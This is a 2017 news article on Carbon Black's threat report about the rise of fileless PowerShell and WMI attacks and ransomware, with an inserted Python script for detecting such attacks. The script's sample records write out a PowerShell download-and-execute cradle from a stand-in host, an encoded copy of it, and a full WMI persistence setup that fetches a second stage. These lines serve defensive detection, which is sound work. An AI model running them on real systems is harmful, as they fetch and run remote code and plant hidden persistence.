12/21/2017
12:00 PM

Fileless Malware Attacks Hit Milestone in 2017

Non-malware attacks account for the majority of all attacks this year, and ransomware grows to a $5 billion industry, new data shows.

Fileless malware attacks using PowerShell or Windows Management Instrumentation (WMI) tools accounted for 52% of all attacks this year, beating out malware-based attacks for the first time, according to Carbon Black's 2017 Threat Report.

"Attackers will use whatever is the cheapest and most effective method," says Rick McElroy, security strategist for Carbon Black, explaining the shift to fileless malware from malware-based attacks.

Fileless malware attacks, also known as non-malware attacks, let cybercriminals skip steps that a malware-based attack requires, such as building a malicious payload and dropping it onto the victim's disk. Instead, attackers abuse trusted tools that ship with the operating system, such as PowerShell and WMI, to run their code entirely in memory, and they lean on Web browsers and Office applications to gain that initial foothold.
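Because the tooling is legitimate, detection has to look at what PowerShell and WMI are asked to do rather than at a file on disk. The script below is an added illustration, not code from the article or from Carbon Black: it runs a small set of heuristics over constructed records shaped like PowerShell script-block text (event ID 4104) and process command lines, decodes any -EncodedCommand payload (base64 of a UTF-16LE script) before matching so the usual obfuscation does not hide a download cradle, and flags WMI event-subscription persistence. The indicator list, the record contents and the hosts under example.invalid are assumptions made for the example.

```python
"""Heuristic triage of PowerShell / WMI records for fileless-attack indicators.

Added example, not code from the article or from Carbon Black. The records
below are constructed to look like PowerShell script-block text (event 4104)
and process command lines; the hosts under example.invalid are made up.
"""
import base64
import re

# Indicator families seen in in-memory tooling: download cradles, in-memory
# assembly loading, hidden windows / policy bypass, AMSI tampering and WMI
# event-subscription persistence. Assumed list for the example, not exhaustive.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)\b(DownloadString|DownloadData|Invoke-WebRequest|IWR|curl)\b|Net\.WebClient"),
    "invoke_expression": re.compile(r"(?i)\b(Invoke-Expression|IEX)\b"),
    "reflective_load": re.compile(r"(?i)\[(System\.)?Reflection\.Assembly\]::Load"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "bypass_policy": re.compile(r"(?i)-(ep|ExecutionPolicy)\s+bypass"),
    "amsi_tamper": re.compile(r"(?i)amsiInitFailed|AmsiScanBuffer"),
    "wmi_persistence": re.compile(
        r"(?i)__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding|Register-WmiEvent"),
}

# -EncodedCommand (and its short forms) carries base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(r"(?i)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_record(text):
    """Count the indicator families hit by one record.

    The encoded payload is decoded and matched as well, so -enc obfuscation
    does not hide a cradle that would be obvious in plain text.
    """
    decoded = decode_encoded_command(text)
    views = [text] + ([decoded] if decoded else [])
    hits = {name for name, rx in INDICATORS.items() if any(rx.search(v) for v in views)}
    if decoded is not None:
        hits.add("encoded_command")
    return len(hits), sorted(hits)


def triage(records, threshold=2):
    """Return (id, score, hits) for records with at least `threshold` indicator families."""
    flagged = []
    for rec in records:
        score, hits = score_record(rec["text"])
        if score >= threshold:
            flagged.append((rec["id"], score, hits))
    return flagged


# Constructed sample telemetry (not real captures).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_RECORDS = [
    {"id": "benign",
     "text": "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\""},
    {"id": "cradle",
     "text": 'powershell.exe -w hidden -ep bypass -c "' + _CRADLE + '"'},
    {"id": "encoded",
     "text": "powershell.exe -NoProfile -NonInteractive -enc " + _ENCODED},
    {"id": "wmi", "text": r"""$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='Updater'; EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='Updater'; CommandLineTemplate='powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage2.ps1'')"'}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$f; Consumer=$c}"""},
]

if __name__ == "__main__":
    for rec_id, score, hits in triage(SAMPLE_RECORDS):
        print(f"{rec_id}: {score} indicator families {hits}")
```

On a real host the inputs would come from PowerShell script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and, for the WMI case, Sysmon event IDs 19 to 21; the script shows only the matching step. A single indicator such as a hidden window is common in legitimate administration scripts, which is why the triage counts indicator families rather than alerting on any one hit.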

Fileless attacks have been around since 2014 and surged last year as attackers embraced in-memory techniques and refined them. That trend continued this year: fileless attacks against endpoints protected by Carbon Black grew 6.8% month over month.

All attacks, malware-based and fileless combined, grew 13% per month this year, according to the report.

Kryptik, Strictor, Nemucod, Emotet, and Skeeyah were the five top malware families this year, according to the report. And the top three industries hit this year by malware authors included finance, healthcare, and retail.

Ransomware 

Ransomware soared to a $5 billion industry this year, Cybersecurity Ventures reports, up from $850 million the previous year, according to Carbon Black's report.

"Both the volume of attacks and amount per attack were up," McElroy says. "But it was also the crazy value of Bitcoin that increased it to $5 billion."

Cybercriminals often demand ransom payments in Bitcoin, which has seen a sharp rise in value this year. According to CoinDesk, a single Bitcoin now carries a value of approximately $16,000, compared to January when it was $1,000 per coin.

Ransomware authors targeted the technology industry, followed by the government and non-profit sector, and legal industry, according to the report. The top five ransomware families in 2017 included Spora, Cryptxxx/Exxroute, Locky, Cerber, and Genasom.

In the future, Carbon Black expects targeted ransomware attacks to become more common, an expectation shared by a growing number of research firms. Earlier this year, a handful of targeted attacks emerged that focused on specific industries, geographies, or company sizes as cybercriminals sought a better return on investment, security experts say.

Cybercriminals are expanding beyond ransomware "spray and pray" attacks delivered by spam. Patrick Wheeler, director of threat intelligence for Proofpoint, says spray and pray campaigns were designed to infect as many machines as possible with the expectation that a certain percentage of the victims would pay the ransom.

Anton Ivanov, lead malware analyst with Kaspersky Lab, says ransomware will mostly involve targeted campaigns in the future because attackers know they can get more money with this method.

Financial organizations, higher-education institutions, and healthcare, manufacturing, and technology companies are among the sectors hit this year with targeted ransomware campaigns.

Carbon Black's McElroy says ransomware authors are also expected to focus increasingly on Linux systems, because a large percentage of enterprises run that operating system. In addition, McElroy expects ransomware authors to extend their reach to mobile devices.

The Android operating system found in a large percentage of smartphones and tablets across the globe uses a flavor of Linux, McElroy notes.

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET's ...

Comments
alphaa10, User Rank: Strategist, 1/23/2018 | 4:46:58 AM
Windows Broken
If we held a contest to see which lemming would be first to leap from a cliff, we can rest assured all would leap at the opportunity. If Windows users find the analogy distasteful, they did not read the memo, years ago, from a Microsoft executive who said, "Windows is just not designed for security."

Of course, it is easy to understand: none thinks his own Windows installation will be hit, and most act as though they simply do not care, at least until they do meet disaster.

But how remarkable that after at least 20 years of security crises of major and growing proportions with Windows, high-profile, relatively high-value Windows installations continue as a preferred target for any attacker.

 